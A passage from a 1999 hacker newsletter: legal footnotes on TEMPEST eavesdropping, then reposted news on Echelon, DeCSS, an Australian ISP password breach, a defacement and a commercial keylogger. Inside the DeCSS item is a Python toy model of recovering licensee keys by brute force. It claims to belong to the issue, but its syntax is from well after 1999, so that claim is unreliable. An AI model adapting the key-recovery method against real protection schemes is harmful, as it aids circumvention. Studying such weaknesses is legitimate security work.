25. 301.2(1) of the Canadian criminal code states that anyone who: ... without color of right, (a) obtains, directly or indirectly, any computer service, (b) by means of an electromagnetic ... or other device, intercepts or causes to be intercepted, either directly or indirectly, any function of a computer system ... [is guilty of an indictable offence].

26. UNITED STATES SENTENCING COMM'N, FEDERAL SENTENCING GUIDELINES MANUAL (1988) (Principles Governing the Redrafting of the Preliminary Guidelines "g." (at an unknown page)).

27. There has been great debate over what exactly is a computer crime. There are several schools of thought. The more articulate school, and the one to which the author adheres, holds that the category computer crime should be limited to crimes directed against computers; for example, a terrorist destroying a computer with explosives would fall into this category. Crimes such as putting ghost employees on a payroll computer and collecting their pay are merely age-old accounting frauds; today the fraud involves a computer because the records are kept on a computer. The computer is merely ancillary to the crime. This has been mislabeled computer crime and should merely be referred to as a fraud perpetrated with the aid of a computer. Finally, there are information crimes. These are crimes related to the purloining or alteration of information. These crimes are more common and more profitable due to the computer's ability to hold and access great amounts of information. TEMPEST ELINT can best be categorized as an information crime.

28. Compare, for example, the Watergate break-in, in which the burglars were discovered when they returned to move a poorly placed spread spectrum bug.

29. TEMPEST Certified refers to the equipment having passed a testing and emanations regime specified in NACSIM 5100A.
This classified document sets forth the emanations levels that the NSA believes digital equipment can give off without compromising the information it is processing. TEMPEST Certified equipment is theoretically secure against TEMPEST eavesdropping.

30. Previously the Bureau of Standards. The NIST is a division of the Commerce Department.

31. In this case computer equipment would include all peripheral computer equipment. There is no use in using a TEMPEST Certified computer if the printer or the modem are not Certified.

32. The NSA has tried to limit the availability of TEMPEST information to prevent the spread of the devices. For a discussion of the First Amendment and prior restraint see, e.g., The United States of America v. Progressive, Inc., 467 F.Supp 990 (W.D. Wis. 1979) (magazine intended to publish plans for nuclear weapon; prior restraint injunction issued), reh. den. United States v. Progressive Inc., 486 F.Supp 5 (W.D. Wis. 1979), motion den.; Morland v. Sprecher, 443 US 709 (1979) (mandamus), motion denied; United States v. Progressive, Inc., 5 Media L R (7th Cir. 1979), dismd. without op.; U.S. v. Progressive, Inc., 610 F.2d 819 (7th Cir. 1979); New York Times Co. v. United States, 403 U.S. 713 (1971) (per curiam) (Pentagon Papers case: setting forth prior restraint standard which government was unable to meet); T. EMERSON, THE SYSTEM OF FREEDOM OF EXPRESSION (1970); Balance Between Scientific Freedom and National Security, 23 JURIMETRICS J. 1 (1982) (current laws and regulations limiting scientific and technical expression exceed the legitimate needs of national security); Hon. M. Feldman, Why the First Amendment is not Incompatible with National Security, HERITAGE FOUNDATION REPORTS (Jan. 14, 1987). Compare Bork, Neutral Principles and Some First Amendment Problems, 47 IND. L. J. 1 (First Amendment applies only to political speech); G. Lewy, Can Democracy Keep Secrets, 26 POLICY REVIEW 17 (1983) (endorsing draconian secrecy laws mirroring the English system).

33. For example, the NSA has just recently allowed the Drug Enforcement Agency (DEA) to purchase TEMPEST Certified computer equipment. The DEA wanted secure computer equipment because wealthy drug lords were using TEMPEST eavesdropping equipment.

34. An Act to regulate the use of automatically processed information relating to individuals and the provision of services in respect of such information. - Data Protection Act 1984, Long Title.

35. "Personal data" means data consisting of information which relates to a living individual who can be identified from that

36. "Data user" means a person who holds data, and a person "holds" data if -- (a) the data form part of a collection of data processed or intended to be processed by or on behalf of that person as mentioned in subsection (2) above; [subsection (2) defines "data"] and (b) that person (either alone or jointly or in common with other persons) controls the contents and use of the data comprised in the collection; and (c) the data are in the form in which they have been or are intended to be processed as mentioned in paragraph (a) above or (though not for the time being in that form) in a form into which they have been converted after being so processed and with a view to being further so processed on a subsequent occasion. - Data Protection Act 1(5).

37. Data Protection Act 1984, 4, 5.

38. An individual who is the subject of personal data held by a data user... and who suffers damage by reason of (1)(c) ... the disclosure of the data, or access having been obtained to the data without such authority as aforesaid shall be entitled to compensation from the data user... for any distress which the individual has suffered by reason of the ... disclosure or access. - Data Protection Act 1984 23.

39. ... it shall be a defense to prove that ... the data user ... had taken such care as in all the circumstances was reasonably required to prevent the... disclosure or access in question. - Data Protection Act 1984 23(3).

@HWA

15.0 Russians Seize Nuclear Expert's Computer
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by EvilWench

Joshua Handler, a Princeton University specialist in nuclear radiation and security, has had his computer and documents seized by the Russian Secret Service (FSB).

Russia Today
http://www.russiatoday.com/news.php3?id=105308

FSB Seizes Computer, Notes, From U.S. Nuclear Expert

MOSCOW, Oct 29, 1999 -- (Agence France Presse) Russia's secret service seized a computer and documents from the Moscow apartment of a US nuclear security expert, the Interfax news agency reported Thursday, citing a Russian colleague.

The FSB, successor to the KGB, seized the computer, research documents, manuscripts and notes from the apartment of Joshua Handler, a Princeton University specialist in nuclear radiation and security, the colleague, Alexei Yablokov, told Interfax. The seizure took place on Wednesday, he said.

((c) 1999 Agence France Presse)

@HWA

16.0 Sir Dystic and Kevin Poulsen to Speak
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by s_d

Sir Dystic, creator of the original Back Orifice, and Kevin Poulsen, currently a columnist for ZD Net, will be speaking at the 16th World Conference on Computer Security and Control on November 3, 1999. The conference will be held in London, England.

Compsec International 99
http://www.elsevier.nl:80/homepage/sag/compsec99/menu2.htm

@HWA

17.0 Invisible KeyLogger97
     ~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

C|Net has listed what it calls the top 10 technology products that will "scare you to death"! Number 8 on that list is Invisible KeyLogger 97, designed to capture every keystroke including passwords.
(This is yet another commercial Back Orifice-like product. Why are the Anti-Virus companies refusing to release definitions for these?)

C|Net
http://www.cnet.com/Content/Gadgets/Guides/Terrors/ss03.html

KeyLogger
http://www.keylogger.com/

Invisible KeyLogger 97

Trick: Logs every keystroke in Windows.
Treat: Your enemy has a record of every email message and document you type.

If you have to leave your computer unattended and want to make sure that no one tampers with it, install Invisible KeyLogger 97 (IK97). It silently grabs every Windows keystroke and adds it to a log file, essentially recording everything that happens while you're away. You can also use IK97 to monitor your children's PC use and to provide backup copies of everything that you type.

This is a great tool, but what if someone else were to secretly install IK97 on your PC and monitor you? If you share a workstation, or if someone gets to your system when it's unattended, IK97 can be used to steal your passwords and record your private email and documents. Remember that message you sent about your boss's ugly hairdo? You deleted it from your out-box, but IK97 still has a copy of it.

To find out if IK97 is running on your system, hit Ctrl-Alt-Delete. If you see a program called ik in the Close Program dialog box, that's Invisible KeyLogger 97, and you can stop it by selecting End Task. Unfortunately, however, IK97 has a sibling called Invisible KeyLogger Stealth (IKS) that doesn't show up in the dialog box since it's a virtual device driver (VxD) and not an application. So, if it's watching you, you're out of luck. To make sure you don't get spied on, change your passwords frequently, and work on confidential or incriminating files on your home PC. IK97 might be watching.
@HWA

18.0 Hoax: Gov-boi Killed in Car Accident (not)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by deepquest, Cruciphux and mosthated

Gov-boi, aka Insanity (Rick Stoeppelwerth), of http://www.hack.co.za passed away Sunday night in a terrible car accident. His loss is a tragedy and his security expertise will be greatly missed by all who knew him. He was known on irc as gov-boi or hotmetal.

http://www.hack.co.za/

The Stamford Advocate
http://www.stamfordadvocate.com/Advocate/release/10-31-1999/article1.html

Gov-boi pulled one over on us, and put up a notice on his website saying that he had died in a car accident, after a discussion on IRC where it was suggested he be a 'ghost hacker' for Halloween. So he took it one step further and pretended he had passed away; by staying off irc with his nick, ppl assumed it was true. There was also an article (Stamford Advocate) attached to the story which is actually about some other poor soul that died around the same time gov-boi was supposed to have died. I emailed the story to hackernews and apparently so did several other ppl who were sucked in to the story before finding out it was all a hoax. Insanity however (Rick Stoeppelwerth) did die in a car crash and it was the story that added credence to the claim, although Stamford is a long way from .za (South Africa) where gov-boi lives. Sorry to all involved for providing incorrect info and condolences to Insanity and his family for their loss.

@HWA

19.0 Australia Admits to Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no-one

The Inspector General of Intelligence and Security for Australia, Bill Blick, has told the BBC that Australia's Defence Signals Directorate (DSD) is indeed part of the global eavesdropping network known as Echelon. Both the US and Britain still deny the existence of this network.
BBC
http://news.bbc.co.uk/hi/english/world/newsid_503000/503224.stm

World

Global spy network revealed

Listening in to your phone calls and reading your emails

By Andrew Bomford of BBC Radio 4's PM programme

Imagine a global spying network that can eavesdrop on every single phone call, fax or e-mail, anywhere on the planet.

It sounds like science fiction, but it's true.

Two of the chief protagonists - Britain and America - officially deny its existence. But the BBC has confirmation from the Australian Government that such a network really does exist and politicians on both sides of the Atlantic are calling for an inquiry.

On the North Yorkshire moors above Harrogate they can be seen for miles, but still they are shrouded in secrecy. Around 30 giant golf balls, known as radomes, rise from the US military base at Menwith Hill.

Linked to the NSA

Inside is the world's most sophisticated eavesdropping technology, capable of listening-in to satellites high above the earth.

The base is linked directly to the headquarters of the US National Security Agency (NSA) at Fort Meade in Maryland, and it is also linked to a series of other listening posts scattered across the world, like Britain's own GCHQ.

The power of the network, codenamed Echelon, is astounding.

Every international telephone call, fax, e-mail, or radio transmission can be listened to by powerful computers capable of voice recognition. They home in on a long list of key words, or patterns of messages. They are looking for evidence of international crime, like terrorism.

Open Oz

The network is so secret that the British and American Governments refuse to admit that Echelon even exists. But another ally, Australia, has decided not to be so coy.

The man who oversees Australia's security services, Inspector General of Intelligence and Security Bill Blick, has confirmed to the BBC that their Defence Signals Directorate (DSD) does form part of the network.

"As you would expect there are a large amount of radio communications floating around in the atmosphere, and agencies such as DSD collect those communications in the interests of their national security", he said.

Asked if they are then passed on to countries like Britain and America, he said: "They might be in certain circumstances."

But the system is so widespread all sorts of private communications, often of a sensitive commercial nature, are hoovered up and analysed.

Journalist Duncan Campbell has spent much of his life investigating Echelon. In a report commissioned by the European Parliament he produced evidence that the NSA snooped on phone calls from a French firm bidding for a contract in Brazil. They passed the information on to an American competitor, which won the contract.

"There's no safeguards, no remedies, " he said, "There's nowhere you can go to say that they've been snooping on your international communications. It's a totally lawless world."

Breaking the silence

Both Britain and America deny allegations like this, though they refuse to comment further. But one former US army intelligence officer has broken the code of silence.

Colonel Dan Smith told the BBC that while this is feasible, it is not official policy: "Technically they can scoop all this information up, sort through it, and find what it is that might be asked for," he said. "But there is no policy to do this specifically in response to a particular company's interests."

Legislators on both sides of the Atlantic are beginning to sit up and take notice. Republican Congressman Bob Barr has persuaded congress to open hearings into these and other allegations. In December he is coming to Britain to raise awareness of the issue.

In an interview with the BBC he accused the NSA of conducting a broad "dragnet" of communications, and "invading the privacy of American citizens."

He is joined in his concerns by a small number of politicians in Britain. Liberal Democrat MP Norman Baker has tabled a series of questions about Menwith Hill, but has been met with a wall of silence.

"There's no doubt it's being used as a listening centre," he said, "There's no doubt it's being used for US interests, and I'm not convinced that Britain's interests are being best served by this."

@HWA

20.0 DVD Copy Protection Broken
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Because one licensee implemented the DVD copy protection scheme improperly, it was easily broken. The player software from one licensee (Xing) shipped with its CSS decryption key left unencrypted. This gave the Masters of Reverse Engineering (MoRE) from Norway a first valid key, from which they were able to 'guess' other licensees' keys. They then developed the DeCSS utility, which can copy a DVD movie.

Wired
http://www.wired.com/news/technology/0,1282,32263,00.html

Why the DVD Hack Was a Cinch

by Andy Patrizio

2:15 p.m. 2.Nov.1999 PST

The anonymous developers of the decryption program that removes DVD copy protection had an easy time doing it, thanks to a gaffe by a software developer and the surprising weakness of the encryption technology.

Essentially, the two European hackers who developed the DeCSS utility that copies a DVD movie disc were able to break the code because one of the product's licensees inadvertently neglected to encrypt the decryption key.

Industry experts were stunned by the hack because DVD as a movie-playing format is supposed to be copy-proof. In fact, DVD would not be on the market today without the permission of the motion picture industry which, sources say, is reeling from this development.

Breaking DVD's encryption was considered extremely difficult, but once the first key was discovered, the rest fell with ease, since the crackers were able to use their original, valid key as a launch point to find more valid decryption keys.
DeCSS is a tiny (60 KB) utility that copies the encrypted DVD video file, which has a .VOB extension, and saves it to the hard disc without encryption. Since DVD movies can range in size from 4.7 GB to 9.4 GB and recordable DVD has at best 2.5 GB capacity (or 5.2 GB for double-sided discs), direct DVD copying is unfeasible. But starting next year, 4.7 GB recordable DVD drives will hit the market, making duplication of DVD discs much easier.

DVD uses a security method called the Content Scrambling System. CSS is a form of data encryption used to discourage reading media files directly from the disc without a decryption key. To descramble the video and audio, a 5-byte (40-bit) key is needed.

Every player -- including consoles from Sony, Toshiba, and other consumer electronics vendors, as well as software vendors for PCs like WinDVD and ATI DVD -- has its own unique unlock key. Every DVD disc, in turn, has 400 of these 5-byte keys stamped onto the disc. That way, the unlock key from every licensee, be it WinDVD or a Pioneer DV-525 unit, will read the disc.

All licensees of DVD technology have to encrypt their decryption key so no one can reverse-engineer the playback software and extract the key. Well, one licensee didn't encrypt their key.

The developers of DeCSS, a Norwegian group called MoRE (Masters of Reverse Engineering), got a key by reverse-engineering the XingDVD player, from Xing Technologies, a subsidiary of RealNetworks.

"We found that one of the companies had not encrypted their CSS decryption code, which made it very easy for us," said Jon Johansen, a founder of MoRE, in Norway. "We didn't think it would be that easy, in fact."

RealNetworks did not return repeated calls requesting comment.

Because the unlock key is 5 bytes long, Johansen and his two partners, who wish to remain anonymous, were able to guess a whole slew of other keys. So even if all future DVD movies remove the Xing key, DeCSS has a plethora of other keys to choose from.

Johansen and his partners were able to guess more than 170 working keys by trial and error before finally just giving up to go do something else.

"I wonder how much they paid for someone to actually develop that weak algorithm," said Johansen. "It's a very weak encryption algorithm."

Leaving such a weak link in the security chain surprised industry people.

"I am really surprised that they made it that easy to break into," said Kevin Hause, senior analyst with International Data Corp. "One of the key concerns about DVD was security."

"I don't think it's the end of the world, but it'll be interesting to see what steps the industry takes now, whether they start delaying the releases of certain titles," said Bill Hunt, webmaster of The Digital Bits, a DVD news site. "I would expect it could also delay the advent of recordable DVD, because it'll give people a medium to write these hacked video files."

Others aren't so talkative. The Motion Picture Association of America (MPAA) declined to comment. The DVD Forum, based in Japan, was unreachable due to a national holiday, but it did issue a carefully worded statement.

"The circulation through the Internet of the illegal and inappropriate software is against the stream of copyright protection. Toshiba, which has led the establishment of the DVD format and is the chair-company of the DVD Forum, feels it is a great pity," wrote Masaki Mikura, manager of the strategic partnership and licensing division at Toshiba Ltd.

"In the future, the laboratories will be more actively conducting strict surveillance and take counter measures against illegal, inappropriate software and hardware in the market. Moreover, we believe that, based on the recent legislation, legal measures and steps will be taken by copyright holders against such violation of intellectual properties," Mikura wrote.
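The structural weakness the Wired piece describes (one disc key, stored on every disc once under each licensee's player key, and a key space small enough to search) is easy to see in a toy model. The block below is an added example written for this issue; it is not CSS, not DeCSS, and not code from MoRE or Xing. The real cipher is replaced by a stand-in (XOR against a SHA-256 keystream) and the player keys are shrunk from 40 to 16 bits so the search finishes in seconds; the disc key, the four licensee keys and the "leaked slot" are constructed for the demo. What it shows is the generalization: once a single licensee's key is known, the disc key falls out of that licensee's slot, and every other slot becomes a known-plaintext brute force over the key space.

```python
"""Toy model of a per-licensee key table collapsing after one key leaks.

Added example, not CSS/DeCSS. Stand-in cipher: XOR with a SHA-256 keystream.
Toy key size: 16 bits (CSS player keys are 40 bits); the disc key is 5 bytes
as in the article. All keys below are constructed for the demo.
"""
import hashlib

KEY_BITS = 16  # toy size so the exhaustive search is fast


def keystream(key, n):
    """Stand-in keystream: SHA-256 of the key, truncated to n bytes."""
    return hashlib.sha256(key.to_bytes(8, "big")).digest()[:n]


def encrypt(key, data):
    """XOR data with the keystream; the same call decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


decrypt = encrypt  # XOR keystream is its own inverse


def make_key_table(disc_key, player_keys):
    """The disc's key block: the one disc key encrypted under every licensee key."""
    return [encrypt(pk, disc_key) for pk in player_keys]


def recover_disc_key(table, leaked_slot, leaked_player_key):
    """A leaked player key (e.g. pulled from an unobfuscated player binary)
    decrypts its own slot and yields the disc key."""
    return decrypt(leaked_player_key, table[leaked_slot])


def brute_force_slot(ciphertext, known_disc_key):
    """Known-plaintext search: the only unknown in E(pk, disc_key) is pk."""
    for candidate in range(1 << KEY_BITS):
        if encrypt(candidate, known_disc_key) == ciphertext:
            return candidate
    return None


def recover_all_player_keys(table, leaked_slot, leaked_player_key):
    """Leak one key, learn the disc key, then search every other slot."""
    disc_key = recover_disc_key(table, leaked_slot, leaked_player_key)
    return disc_key, [brute_force_slot(c, disc_key) for c in table]


def brute_force_seconds(key_bits, trials_per_second):
    """Worst-case wall-clock to exhaust a key space at a given trial rate."""
    return (2 ** key_bits) / trials_per_second


def demo():
    """Constructed scenario: four licensees, slot 1's key is the leaked one."""
    player_keys = [0x1A2B, 0x0042, 0xBEEF, 0x7777]   # constructed licensee keys
    disc_key = bytes.fromhex("0102030405")          # constructed 5-byte disc key
    table = make_key_table(disc_key, player_keys)
    leaked_slot, leaked_key = 1, player_keys[1]     # the "shipped in the clear" key
    got_disc_key, got_keys = recover_all_player_keys(table, leaked_slot, leaked_key)
    return got_disc_key == disc_key and got_keys == player_keys


if __name__ == "__main__":
    print("all licensee keys recovered from one leak:", demo())
    days = brute_force_seconds(40, 1_000_000) / 86400
    print("2^40 keys at 1e6 trials/s: about %.1f days" % days)
```

The point of the model is the table shape, not the cipher: encrypting one secret under N independent keys gives an attacker who learns any one key N-1 known-plaintext targets, and a 40-bit key space is within reach even at a naive million trials per second (the last line prints roughly 12.7 days, before any cipher-specific shortcuts). Real CSS is weaker still, as Johansen says above, but this block makes no claim about how DeCSS itself searches.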
@HWA

21.0 Optus in Australia Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by DogCow

Cable and Wireless Optus/Microplex in Australia suffered what they called an "unauthorized intrusion" at 4:30am AEST on Nov 3rd. According to a press release on the matter, the intruders had "limited access to details of Optus and Microplex customers [but] did not include access to any customers' financial information". Tech support staff indicated that a username/password list was posted to a Usenet group. Rumours suggest that the targeting of Optus may have been inspired by the upcoming Republic referendum in Australia, and it is unclear if the incident is related to the Cable and Wireless breach in October.

Australian Broadcasting Corporation
http://abc.net.au/news/1999/11/item19991103191554_1.htm

Optus Press Release
http://www.2600.org.au/advisories/optus-1199.txt

ABC;

Optus calls police after ISP breached

One of Australia's largest Internet service providers has been forced to advise all customers to change their passwords after a major security breach was uncovered this morning.

Cable and Wireless Optus called in police after what it calls "an unauthorised intrusion" into its system, but angry customers say the breach was the company's own fault.

The company operates under the Optusnet, Microplex and DingoBlue banners, and a huge file containing all the login passwords was made available to anyone who wanted them.

Optus says as soon as its staff were made aware of the breach, it moved to close the security loophole.

However, it took the company nearly 18 hours before it alerted its 100,000 customers via an email that their passwords could no longer be considered secret and should be changed immediately.

http://www.currents.net/newstoday/99/11/05/news7.html

Daily News

ISP Network Hacked

By Adam Creed, Newsbytes.

November 05, 1999

The Internet service provider (ISP) network of Australia's second largest telecommunications provider Cable & Wireless Optus Ltd [AUS:CWO] suffered a major security breach on Wednesday, with customer account details posted on the Internet.

The attack occurred at 4.30am Australian Eastern Daylight Time (AEDT), with user names and passwords of OptusNet and Microplex ISP customers posted on a Usenet news group. Cable & Wireless Optus said that no customer credit card details were made available.

The telco informed the police, but according to local media reports failed to alert its 100,000 or more customers that their passwords had been compromised and should be changed until 18 hours later.

Commenting on the delay, Tony Hill, executive director of the Internet Society of Australia (ISOC-AU), said the Internet user group was concerned, and that Cable & Wireless Optus claimed that every effort was made to inform customers once the breach was repaired and police were notified.

"ISOC-AU is concerned at reports that there may have been a delay in advising customers of the intrusion," Hill told Newsbytes. "Early advice to Internet users in this circumstance is paramount so that they can take action to protect their passwords, accounts and personal information."

Cable & Wireless Optus said in a statement that it immediately closed the breach and is now reviewing and stepping up security procedures.

"Although this intrusion has caused only minimal customer impact, Cable & Wireless Optus is continuing to assess the position to ensure customers are not in any way disadvantaged," said the company, in a statement.

Optus press release;

Optus Internet Intrusion, 3rd November, 1999
--------------------------------------------

Advisory:
---------

The following Cable and Wireless press release was made available to the media on November 3rd, 1999, and is being posted here purely as a convenience given that as of 10pm AEST, it had not been made available in any "Media" or "Press Release" areas on Cable & Wireless / Optus / Microplex websites. The story had, by this stage, been covered by the Australian Broadcasting Corporation and radio station 2GB in Sydney, among other outlets.

The press release was finally placed on the Optus site today (4th Nov) at the following URL:

http://www.cwo.com.au/company/newsArticle.asp?articleId=137

Coverage:
---------

ABC: http://abc.net.au/news/1999/11/item19991103191554_1.htm
SMH: http://www.smh.com.au/news/9911/04/national/national2.html
Newswire: http://www.newswire.com.au/9911/breach.htm

Press Release:
--------------

Cable and Wireless Optus Media Statement

3 November, 1999

Optus Internet Intrusion

At 4:30am today, there was an unauthorised intrusion into the Optus Internet and Microplex network. Cable and Wireless views this intrusion as a serious breach of security and has informed the police.

The intrusion allowed limited access to details of Optus Internet and Microplex customers. It did not allow access to any customer's financial information.

Cable and Wireless Optus took immediate action on confirmation of the breach, preventing any further access.

Although this intrusion has caused only minimal customer impact, Cable and Wireless Optus is continuing to assess the position to ensure customers are not in any way disadvantaged.

The company is reviewing all security procedures to continue to protect the safety and integrity of customer information.

Press release ends.

Notice:
-------

2600 Australia has chosen to mirror this document because a number of our colleagues use Cable & Wireless / Optus / Microplex for Internet access and/or related services. It hence serves as an advisory for them in the absence of information from Cable & Wireless that details the nature of the intrusion and the size of the database of customer information exposed as a result of the breach.

Document last modified: 7:21pm, 4th November, 1999

@HWA

22.0 Romanian Finance Ministry Hit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlaque

Intruders electronically broke into the Romanian Finance Ministry website, modifying and adding taxes, and changing the official exchange rate of the leu to 0.5 per dollar from 16,870 per dollar. One tax was created for 'stupidity' and some taxes were raised to 100%. The Finance Ministry is investigating "how this...was possible."

C|Net
http://news.cnet.com/news/0-1005-200-1427148.html?tag=st.ne.ron.lthd.1005-200-1427148

The UK Register
http://www.theregister.co.uk/991102-000016.html

CNET;

Hackers wreak havoc on Romanian Web site

By Bloomberg News
Special to CNET News.com
November 2, 1999, 9:35 a.m. PT

BUCHAREST--Romania's Finance Ministry said it will investigate how hackers tapped into its Web site and changed tax laws and the leu's exchange rate.

The Web site last weekend showed a tax on "silliness" that varied according to the importance of the taxpayer's job. For one day, the Web site said, monthly wages of as much as 1 million lei ($59.14) would be taxed 100 percent. It also changed the official exchange rate of the leu to 0.5 per dollar from 16,870 per dollar.
The ministry "took immediate measures to restore the Web site's contents and will take further measures to make sure similar situations don't occur in the future," the ministry said in a statement. "The log files of our server are currently being analyzed and investigated to find out how this... was possible."

Romania does not have legislation to prevent and punish Internet crime, although police have reported thousands of cases of Western companies filing complaints of Romanian hackers buying from the Internet using forged credit card numbers.

Copyright 1999, Bloomberg L.P. All Rights Reserved.

UK Register;

Posted 02/11/99 4:10pm by Linda Harrison

Hackers tax the stupid

Romanian pranksters have hacked into a government Web site to levy a tax on the stupid.

The group broke through top level security at the Romanian finance ministry's site to change government information. One of their alterations included placing a tax on stupidity. And the more important the person, the higher the tax.

The cash collected from this would then be used to bribe NATO into accepting Romania into the fold, according to the new look Web site.

Romanian officials said they had started an investigation into the security breach.

A group of UK hackers were also believed to have tried a similar attempt on their own government's Central Office of Information Web site. However, they were forced to abandon the task after the site crashed repeatedly due to "hardware problems". ®

@HWA

23.0 Reuters News Database Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Alexander Vorobyov from the Russian Interior Ministry has informed the TASS news agency that a group or individual known as Kentavr had gained illegal satellite news feeds from the Reuters News Service. Russian officials have labeled this case as the most sophisticated intellectual property crime recently committed in Russia.

(Information presented here was translated from Russian so there may be some inaccuracies.)

ITAR-TASS
http://library.northernlight.com/FC19991102530000207.html?cb=0&dx=1006&sc=0#doc

Moscow hackers gain access to Reuters data base (adds)

Story Filed: Tuesday, November 02, 1999 4:15 PM EST

MOSCOW, November 2 (Itar-Tass) -- The Russian Interior Ministry's department for struggle against economic crime in the sphere of intellectual property has exposed a criminal group reported to have gained illegal access to the data base of Britain's Reuters news agency, press secretary of the Russian Chief Administration for Struggle against Economic Crime Alexander Vorobyov told Tass on Tuesday.

The so-called Kentavr dealing centre was based on a computer class of a Moscow school. A former Reuters employee has been reported to be involved in the crime.

The Russian law-enforcement bodies have already informed the British agency about Kentavr having picked the safety software locks and used the information of the agency to their own advantage.

Head of the Russian department for struggle against crime in the sphere of intellectual property Mikhail Sukhodolsky told Tass that about a year ago, Kentavr had signed a contract with the economic department of Reuters, and under the contract was granted computer hardware and software, including the passwords to the agency's data base.

Later, the company misappropriated the computer equipment and "disappeared" having stopped paying for the Reuters' information. Kentavr then "picked" the safety locks of the agency and gained illegal satellite-supported access to stock-exchange automated quotations and facilities of Reuters.

Kentavr was reported to have rented a floor in a Moscow school. The company entered into criminal collusion with the school administration, which helped to misappropriate 40 personal computers originally bought to equip a computer class at the school.
The dealing centre then advertised in the media that it would provide for low-price access to Reuters network. The police are now after natural and law persons having signed contracts with Kentavr.

According to Reuters security service, the damage done by Kentavr has exceeded 3 million dollars.

According to Vorobyov, the so called dealing centre had been operating without even having registered as a law person. At the same time, the law-enforcement officers were reported to have found documents providing ample evidence of the company having its own bank operating underground, and evading taxes.

The Russian Interior Ministry has qualified that criminal case as a major and most sophisticated crime recently committed in Russia in the sphere of economic crimes against intellectual property.

Copyright © 1999, ITAR/TASS News Agency, all rights reserved.

@HWA

24.0 Taiwan Vulnerable to Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Senior officials in the Taiwanese Defense Ministry are warning that electronic threats from China and other nations will increase dramatically over the next few years. They are asking that Taiwan create a special military cyber force to repel such attacks.

Associated Press
http://library.northernlight.com/EC19991102930000021.html?cb=0&dx=1006&sc=0#doc

Taiwan Vulnerable to Cyber Attacks

Story Filed: Tuesday, November 02, 1999 3:37 PM EST

TAIPEI, Taiwan (AP) -- In five years, China could be able to use computer viruses, hackers and other types of cyber warfare to break down Taiwan's defenses and prepare for an invasion, the Taiwanese military said Tuesday.

Taiwan's economy, government and military are highly dependent on computers and could be vulnerable to a high-tech assault, the official Central News Agency quoted Chang Jia-sheng of the Defense Ministry as saying.

Chang said Taiwan should form a team of experts to prepare the island for possible cyber warfare, the agency reported.

China's cyber arsenal could include computer viruses, hackers and electromagnetic pulses that would disrupt communication networks and create chaos, he said.

The high-tech weapons could quickly take out their targets without much expense or loss of life, Chang said. They could destroy public morale, spread disinformation and cause instability, giving China an excuse to move in and take over the island, he said.

Chang said that although China is technologically backward, it has been able to ``leap frog'' in the past and quickly acquire technology for nuclear weapons, intercontinental ballistic missiles and satellites. Acquiring the ability to use cyber warfare against Taiwan by 2005 is within China's reach, he said.

China and Taiwan have been ruled by separate governments since they split during a civil war in 1949. Beijing considers the island to be a breakaway province and has repeatedly threatened to use force to reunify the two sides if Taipei seeks formal independence. Taipei has said it will gradually reunify with China once the mainland becomes democratic and more economically developed.

Copyright © 1999 Associated Press Information Services, all rights reserved.

@HWA

25.0 30,000 Virus Threats Received by Authorities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by standard

The Gartner Group claims that the FBI and other law enforcement agencies have logged more than 30,000 threats regarding viruses to be released at the start of the new millennium.

(I guess the Y2K bug is no longer sensational enough.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2386686,00.html?chkpt=zdhpnews01

Happy New Year: Y2K viruses ready

By Reuters
November 2, 1999 12:34 PM PT

More than 30,000 threats from computer hackers and virus writers who say they will release new viruses to herald the new year and the new millennium have been logged by the FBI and other law enforcement groups, said Lou Marcoccio, worldwide research director at the technology consulting firm Gartner Group.

"Most of these threats will probably amount to nothing,'' Marcoccio told Reuters after addressing a community banking industry convention in Orlando. "But if just five or 10 viruses are released at the same time, that would overwhelm the ability of ... companies that produce the fixes. It could cause substantial productivity losses.''

In the case of the Melissa virus earlier this year, most computer users, whether individuals or corporations, were able to protect their e-mail and messaging systems because code writers could replicate the virus and distribute the fixes before the virus' release date.

"But these companies can't work on 10 fixes at once,'' Marcoccio said.
Most computer viruses are the work of amateur hackers who are known to one another and gain status by releasing new and successful viruses, he said.

Jan. 1 an appealing target

The date Jan. 1, 2000, presents a very appealing target date for such viruses.

"A lot of these guys don't even care if they get arrested. They just want to be remembered,'' Marcoccio said.

Marcoccio was in Orlando to speak to the America's Community Bankers annual convention. He told the group that a Gartner Group survey of 14,000 people showed that 67 percent of all Americans say they plan to buy seven to 18 days' worth of food and other supplies within three days of Jan. 1.

Public anxiety is way ahead of the actual Y2K threat, according to the assessment of Gartner Group researchers and most other experts. They expect computer problems to be minor, for the most part, with many Y2K problems detected in November and December of this year as date-forward transactions begin to uncover gaps in system protections.

@HWA

26.0 Stupid User Mistakes (are a) Bigger Problem than Viruses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by EvilWench

A survey by Broadcasters Network International has found that accidental deletions of data cause far more problems than viruses or system crashes.

CMP TechWeb
http://www.techweb.com/wire/story/TWB19991029S0008

User Errors Are Key Reason For Data Loss

By Mitch Wagner, InternetWeek
Oct 29, 1999 (10:46 AM)

Accidental deletions are the chief cause of lost data, far exceeding viruses as a cause of bygone bits, a survey found.

"The vast majority of the systems managers' data loss occurs because of accidental deletions, not viruses, not systems crashes," said Phil Proffit, an analyst at Broadcasters Network International, the analyst company that conducted the research.

